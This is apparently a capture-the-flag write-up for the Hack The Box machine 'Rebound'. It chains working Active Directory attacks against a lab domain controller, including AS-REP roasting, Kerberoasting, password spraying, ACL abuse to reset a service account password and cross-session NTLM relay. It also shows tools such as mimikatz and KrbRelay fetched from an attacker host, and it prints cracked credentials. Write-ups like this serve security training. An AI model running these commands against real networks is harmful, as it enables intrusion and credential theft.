Rebound
Recon
SMB
└─$ netexec smb rebound.htb -u 'guest' -p '' --shares
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.114 445 DC01 [+] rebound.htb\guest:
SMB 10.129.229.114 445 DC01 [*] Enumerated shares
SMB 10.129.229.114 445 DC01 Share Permissions Remark
SMB 10.129.229.114 445 DC01 ----- ----------- ------
SMB 10.129.229.114 445 DC01 ADMIN$ Remote Admin
SMB 10.129.229.114 445 DC01 C$ Default share
SMB 10.129.229.114 445 DC01 IPC$ READ Remote IPC
SMB 10.129.229.114 445 DC01 NETLOGON Logon server share
SMB 10.129.229.114 445 DC01 Shared READ
SMB 10.129.229.114 445 DC01 SYSVOL Logon server share
└─$ smbclient -U guest //10.129.229.114/Shared
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 25 17:46:36 2023
.. D 0 Fri Aug 25 17:46:36 2023
4607743 blocks of size 4096. 1021377 blocks available
Enumerate Users
Guest can bind to IPC$, so we can enumerate domain accounts by RID brute-force: netexec resolves SIDs in the domain's range one RID at a time over LSARPC, which needs nothing beyond the guest session.
└─$ netexec smb rebound.htb -u 'guest' -p '' --rid-brute 10000 | tee rid-brute.log
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.114 445 DC01 [+] rebound.htb\guest:
SMB 10.129.229.114 445 DC01 498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.114 445 DC01 500: rebound\Administrator (SidTypeUser)
SMB 10.129.229.114 445 DC01 501: rebound\Guest (SidTypeUser)
SMB 10.129.229.114 445 DC01 502: rebound\krbtgt (SidTypeUser)
SMB 10.129.229.114 445 DC01 512: rebound\Domain Admins (SidTypeGroup)
SMB 10.129.229.114 445 DC01 513: rebound\Domain Users (SidTypeGroup)
SMB 10.129.229.114 445 DC01 514: rebound\Domain Guests (SidTypeGroup)
SMB 10.129.229.114 445 DC01 515: rebound\Domain Computers (SidTypeGroup)
SMB 10.129.229.114 445 DC01 516: rebound\Domain Controllers (SidTypeGroup)
SMB 10.129.229.114 445 DC01 517: rebound\Cert Publishers (SidTypeAlias)
SMB 10.129.229.114 445 DC01 518: rebound\Schema Admins (SidTypeGroup)
SMB 10.129.229.114 445 DC01 519: rebound\Enterprise Admins (SidTypeGroup)
SMB 10.129.229.114 445 DC01 520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.229.114 445 DC01 521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.229.114 445 DC01 522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.229.114 445 DC01 525: rebound\Protected Users (SidTypeGroup)
SMB 10.129.229.114 445 DC01 526: rebound\Key Admins (SidTypeGroup)
SMB 10.129.229.114 445 DC01 527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.229.114 445 DC01 553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.229.114 445 DC01 571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.114 445 DC01 572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.229.114 445 DC01 1000: rebound\DC01$ (SidTypeUser)
SMB 10.129.229.114 445 DC01 1101: rebound\DnsAdmins (SidTypeAlias)
SMB 10.129.229.114 445 DC01 1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.229.114 445 DC01 1951: rebound\ppaul (SidTypeUser)
SMB 10.129.229.114 445 DC01 2952: rebound\llune (SidTypeUser)
SMB 10.129.229.114 445 DC01 3382: rebound\fflock (SidTypeUser)
SMB 10.129.229.114 445 DC01 5277: rebound\jjones (SidTypeUser)
SMB 10.129.229.114 445 DC01 5569: rebound\mmalone (SidTypeUser)
SMB 10.129.229.114 445 DC01 5680: rebound\nnoon (SidTypeUser)
SMB 10.129.229.114 445 DC01 7681: rebound\ldap_monitor (SidTypeUser)
SMB 10.129.229.114 445 DC01 7682: rebound\oorend (SidTypeUser)
SMB 10.129.229.114 445 DC01 7683: rebound\ServiceMgmt (SidTypeGroup)
SMB 10.129.229.114 445 DC01 7684: rebound\winrm_svc (SidTypeUser)
SMB 10.129.229.114 445 DC01 7685: rebound\batch_runner (SidTypeUser)
SMB 10.129.229.114 445 DC01 7686: rebound\tbrady (SidTypeUser)
SMB 10.129.229.114 445 DC01 7687: rebound\delegator$ (SidTypeUser)
└─$ grep SidTypeUser rid-brute.log | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$
Kerberoasting
AS-REP Roast
Now that we have a user list we can try AS-REP roasting: any account with pre-authentication disabled (DONT_REQ_PREAUTH) returns an AS-REP encrypted with the user's key to anyone who asks, and that can be cracked offline.
└─$ netexec ldap rebound.htb -u users.txt -p '' --asreproast output.txt
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP 10.129.229.114 445 DC01 $krb5asrep$23$jjones@REBOUND.HTB:d8cbf8f2307383cff384448cec807eea$5764c7fda80c8a9b05f2c609cfb1f779c0ec5cb16e72e198a5466ff39c74ca844ee06785f37e57e641639ee1c28fba14d26f1cf90f5a0a3bb7e4f55484d834a212542eaa461533d4d5c7d587cc546b4e826d0a2ed9fb614e7fd63d4ef1b934e51055f86a5c2d40549aaa04a0ee85a1816a8475b9f39babab9c07ddac456fecf95f386de4faddbfce6f03c90d26bcca8a31e676fe5c449616673bcf07a34558d8b6338e3ccbfb6f23a6b512a37efbb8e8c3edda7474ff86f92c0fc45d26f67a4ee6dc8aef1fb053d7398a2f671b968cf40c85ae2c3e783d7152a9466562b540f90b57fd733a13694d6505
The KDC_ERR_CLIENT_REVOKED line is one of the listed accounts being disabled or locked out, not a problem with the roast; jjones is the only account that returned a hash, so it is the only one without pre-auth. It doesn't crack with rockyou:
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:13 DONE (2024-11-30 23:36) 0g/s 1068Kp/s 1068Kc/s 1068KC/s !)()45jlr..♦*♥7¡Vamos!♥
Session completed
NoPreAuth
jjones needs no pre-auth, so we can Kerberoast without knowing any password (Charlie Clark's technique): an AS-REQ sent as jjones with another account as the sname comes back with a ticket encrypted under that account's key, which is exactly what a normal TGS-REP Kerberoast hash is. impacket-GetUserSPNs does this with -no-preauth, trying every name in users.txt as the service; names that don't resolve to an account with an SPN fail with KDC_ERR_S_PRINCIPAL_UNKNOWN:
https://www.thehacker.recipes/ad/movement/kerberos/kerberoast#kerberoast-w-o-pre-authentication
└─$ impacket-GetUserSPNs -no-preauth "jjones" -usersfile "users.txt" -dc-host "10.129.229.114" "REBOUND.HTB/"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$d7c4dbecd2025e733074c2f2$…2b7143338bf9ffc10ad6991f0410532a526dbceec2c273561
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$0c67989666e1bd2b097e5c42$…
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$a1f9c6917ccfeb278194d64728c8f4bd$…
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$0eb940ce99443af6c8109361$…
John loaded only the $23$ hash: its krb5tgs format understands etype 23 (RC4-HMAC) only, so the three $18$ (AES256) tickets for krbtgt, DC01$ and delegator$ were skipped ("Loaded 1 password hash"). hashcat has modes 19600/19700 for etype 17/18 TGS-REP, but AES keys are derived with PBKDF2 and crack orders of magnitude slower, so the RC4 one is the realistic target anyway. ldap_monitor got an RC4 ticket because its msDS-SupportedEncryptionTypes is empty (see the powerview output later), while delegator$ advertises 28 (RC4 + AES128 + AES256) and the KDC picks the strongest type the service supports. The ldap_monitor hash cracked:
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1GR8t@$$4u (?)
1g 0:00:00:06 DONE (2024-11-30 23:47) 0.1429g/s 1864Kp/s 1864Kc/s 1864KC/s 1Goatrope..1BLAYDE
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Creds:
ldap_monitor:1GR8t@$$4u
Nothing useful in the SMB shares as ldap_monitor either, just some policy files:
└─$ netexec smb 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -M spider_plus -o DOWNLOAD_FLAG=True
The LDAP bind with the password fails: NTLM is refused because of channel binding/signing, so we need Kerberos (-k), and Kerberos needs our clock within 5 minutes of the DC's (the default tolerance), so the clock skew has to be fixed first.
└─$ netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u'
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.114 636 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u
LDAPS 10.129.229.114 636 DC01 [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
└─$ netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -k
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP 10.129.229.114 389 DC01 [-] rebound.htb\ldap_monitor:1GR8t@$$4u KRB_AP_ERR_SKEW
└─$ sudo ntpdate rebound.htb
2024-11-30 22:00:46.814197 (-0500) +25979.048967 +/- 0.045110 rebound.htb 10.129.229.114 s1 no-leap
CLOCK: time stepped by 25979.048967
└─$ echo $(( 25979.048967 / 3600 ))
7.2164024908333326
└─$ faketime -f +7h netexec ldap 10.129.229.114 -u 'ldap_monitor' -p '1GR8t@$$4u' -k
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.114 636 DC01 [+] rebound.htb\ldap_monitor
Bloodhound
Enumerate AD with Bloodhound.
└─$ faketime -f +7h bloodhound-python -u 'ldap_monitor' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op ldap_monitor --zip
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb
INFO: Done in 00M 24S
INFO: Compressing output into 20241201181052_bloodhound.zip
No special privileges on this user in BloodHound; ldap_monitor can't do much by itself.
Users sometimes share passwords, so spray the one we have over the whole user list (one attempt per account, well under any lockout threshold):
└─$ netexec smb 10.129.229.114 -u users.txt -p '1GR8t@$$4u' --continue-on-success
SMB 10.129.229.114 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.114 445 DC01 [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [+] rebound.htb\ldap_monitor:1GR8t@$$4u
SMB 10.129.229.114 445 DC01 [+] rebound.htb\oorend:1GR8t@$$4u
SMB 10.129.229.114 445 DC01 [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE
SMB 10.129.229.114 445 DC01 [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE
Creds:
oorend:1GR8t@$$4u
Update bloodhound
└─$ faketime -f +7h bloodhound-python -u 'oorend' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 -op oorend --zip
Bloodhound surprisingly is showing nothing 🤔
💀 Skill issue, I forgot to use -c all.
The all collection method fails because of ObjectProps 💀, so run without it:
└─$ faketime -f +7h bloodhound-python -u 'oorend' -p '1GR8t@$$4u' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op oorend --zip -c Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn
INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos # <----------
INFO: Found 2 ous # <----------
INFO: Found 19 containers # <----------
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: User with SID S-1-5-21-4078382237-1492182817-2568127209-7686 is logged in on dc01.rebound.htb
INFO: Done in 00M 20S
INFO: Compressing output into 20241201181255_bloodhound.zip
Following the oorend user's outbound permissions I ended up on the winrm_svc user (there's also the batch user, but it can't PS Remote), who can use WinRM, meaning we can get a shell on the box. But what the Service Users group is, is unknown to me for now... After some searching it doesn't seem like a built-in role.

Powerview Enumeration
Enumerate with powerview.py (Kerberos again, so faketime):
└─$ faketime -f +7h powerview rebound.htb/oorend:'1GR8t@$$4u'@10.129.229.114 --dc-ip 10.129.229.114 -k
Logging directory is set to /home/woyag/.powerview/logs/10.129.229.114
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser ldap_monitor
cn : ldap_monitor
distinguishedName : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
name : ldap_monitor
objectGUID : {cf7691bd-5b32-407d-9d42-262013f10288}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 04/08/2023
lastLogoff : 0
lastLogon : 12/01/2024
pwdLastSet : 04/08/2023
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7681
sAMAccountName : ldap_monitor
sAMAccountType : 805306368
servicePrincipalName : ldapmonitor/dc01.rebound.htb
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
msDS-SupportedEncryptionTypes :
PV > Get-DomainUser oorend
cn : oorend
distinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
name : oorend
objectGUID : {edb118e8-3995-45d9-89f1-bf978e4e7fa4}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 04/09/2023
lastLogoff : 0
lastLogon : 12/01/2024
pwdLastSet : 04/08/2023
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
sAMAccountName : oorend
sAMAccountType : 805306368
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
msDS-SupportedEncryptionTypes :
List the ACEs on any domain object that name the user as trustee (search by SID):
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7681
[2024-11-30 23:10:37] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2024-11-30 23:11:00] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : 0x8
InheritanceType : None
SecurityIdentifier : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
oorend's only ACE is Self (access mask 0x8, RIGHT_DS_SELF, a "validated write") on the ServiceMgmt group, with no object type narrowing it. On a group object the validated write is Self-Membership: oorend can add or remove its own account in ServiceMgmt and nothing else (it can't touch the group's other attributes, and a group has no credentials or SPN to abuse).
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-11-30 23:26:31] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ObjectSID : None
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : FullControl
AccessMask : 0xf01ff
InheritanceType : None
SecurityIdentifier : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
ServiceMgmt has FullControl (0xf01ff, what BloodHound calls GenericAll) on the OU=Service Users object, but with InheritanceType None: the ACE covers the OU itself, not the accounts inside it, so membership alone does not let us write their attributes. It does include WriteDacl on the OU, which is enough to add a new ACE that is inherited by the child objects, and that is where the service accounts live, as the password reset further down shows.
Still no idea what the group is for, but we'll probably need to get into it first.
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209
[2024-12-01 18:32:03] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
Add oorend to the ServiceMgmt group (Self-Membership is all that's needed):
(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity servicemgmt -Members oorend
[2024-12-01 18:49:47] User oorend successfully added to servicemgmt
PV > Get-DomainGroupMember -Identity SERVICEMGMT -Select MemberName
ppaul
fflock
oorend
The Add-DomainObjectAcl below was failing with insufficient permissions even though we are already in the group. The most likely cause: group membership is evaluated when the session authenticates, and the powerview session was bound before the membership change, so its token carries no ServiceMgmt SID; a fresh bind (which every bloodyAD invocation below does) picks it up.
Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity "oorend" -Rights "FullControl"
GenericAll abuse
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
[+] oorend added to ServiceMgmt
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 set password winrm_svc Password123$
[+] Password changed successfully!
A scheduled cleanup job on the box resets the password (and undoes the group membership and the ACE) periodically, so keep the three commands together and re-run them whenever access drops:
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 set password winrm_svc Password123$
An alternative would have been the Shadow Credentials attack with Certipy, but it fails because PKINIT is not enabled (I think(?)).
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add groupMember ServiceMgmt oorend
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend
└─$ faketime -f +7h certipy-ad shadow auto -u oorend@rebound.htb -p '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb -dc-ip 10.129.229.114 -dns-tcp -timeout 99 -ns 10.129.229.114
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '24ad6f85-6f2b-2d7a-b532-1aafab717dea'
[*] Adding Key Credential with device ID '24ad6f85-6f2b-2d7a-b532-1aafab717dea' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID '24ad6f85-6f2b-2d7a-b532-1aafab717dea' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': None
The Shadow Credentials attack can also be done with bloodyAD; it writes the same msDS-KeyCredentialLink value and would hit the same KDC_ERR_PADATA_TYPE_NOSUPP here, because that error is the KDC saying it has no support for PKINIT (no certificate it can use for Kerberos authentication), so the key credential gets written but can't be turned into a TGT or an NT hash.
└─$ bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.129.229.114 add shadowCredentials winrm_svc
User.txt
└─$ evil-winrm -i 10.129.229.114 -u winrm_svc -p Password123$
*Evil-WinRM* PS C:\Users\winrm_svc> ls $ENV:USERPROFILE -fil *.txt -rec | %{$_.FullName;cat $_.FullName}
C:\Users\winrm_svc\Desktop\user.txt
4fa95b20c867f31483a4dc3367420924
Privilege Escalation
Update bloodhound data with winrm_svc
└─$ faketime -f +7h bloodhound-python -u 'winrm_svc' -p 'Password123$' -d rebound.htb -k -ns 10.129.229.114 --dns-tcp --dns-timeout 100 -op winrm_svc --zip -c Group,LocalADmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn
*Evil-WinRM* PS C:\Users\winrm_svc\Music> iwr 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\wp.exe | tee -filepath wp.log
...
*Evil-WinRM* PS C:\Users\winrm_svc\Music> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
395 32 12548 21156 2844 0 certsrv
474 19 2396 5580 388 0 csrss
269 16 1992 5156 496 1 csrss
357 15 3440 14912 6080 1 ctfmon
399 33 16288 24868 3036 0 dfsrs
181 11 2284 7844 2364 0 dfssvc
289 14 3856 13712 3928 0 dllhost
5375 4792 69148 71060 2892 0 dns
602 25 18320 42684 1000 1 dwm
1503 59 25444 86536 5596 1 explorer
53 6 1780 5420 2824 1 fontdrvhost
53 6 1496 4708 2828 0 fontdrvhost
winPEAS didn't find other logged-in users, but the SI (session ID) column has two values, 0 and 1: session 0 is services, and session 1 has explorer, dwm and ctfmon, i.e. an interactive logon, so another user is logged on.
SharpHound provided more data than the Python collector:
*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/sh.exe -outfile sh.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\sh.exe -c all --zipfilename winrm_svc_local.zip
*Evil-WinRM* PS C:\Users\winrm_svc\Music> download 20241201165126_winrm_svc_local.zip

Bloodhound is also showing it now.

Note: This might have been a skill issue again; I was in Pathfinding with DC01 -> WINRM_SVC and that's probably why I didn't see this connection...
The tbrady user has ReadGMSAPassword, if we can get that user though.

When commands that should work fail over WinRM, it is usually the session's token: WinRM gives a network logon in session 0 with a restricted token, and some things are denied from it. RunasCs can start the command under a new logon session instead.
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> tasklist
tasklist.exe : ERROR: Access denied
+ CategoryInfo : NotSpecified: (ERROR: Access denied:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
The mimikatz credential dump (https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz#credential-dumping) fails, as it should for a non-admin: privilege::debug needs SeDebugPrivilege (c0000061 is STATUS_PRIVILEGE_NOT_HELD) and LSASS can't be opened (0x00000005 is ACCESS_DENIED):
*Evil-WinRM* PS C:\Users\winrm_svc\Music> iwr 10.10.14.99/mimikatz.exe -outfile mimi.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\mimi.exe "privilege::debug" "sekurlsa::logonpasswords" exit
mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz(commandline) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
mimikatz(commandline) # exit
Bye!
Stealing credentials
krbrelayx can't be used here: the authentication has to be coerced on the DC itself, across sessions, from the user logged on in session 1, and there's no Python on the DC. KrbRelay is a C# tool, so it runs on the box. It registers a local COM server and triggers a DCOM activation in the other session, so that session's user authenticates to our listener; with -ntlm we ask for NTLM instead of Kerberos, which hands us a NetNTLMv2 challenge/response for that user to crack offline.
*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/KrbRelay.exe -out kr.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\kr.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm
[-] Session 1 does not exists
*Evil-WinRM* PS C:\Users\winrm_svc\Music> curl 10.10.14.99/RunasCs.exe -out rc.exe
*Evil-WinRM* PS C:\Users\winrm_svc\Music> .\rc.exe uwu uwu -l 9 "C:\Users\winrm_svc\Music\kr.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm"
[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\Music\kr.exe
[*] Register com server
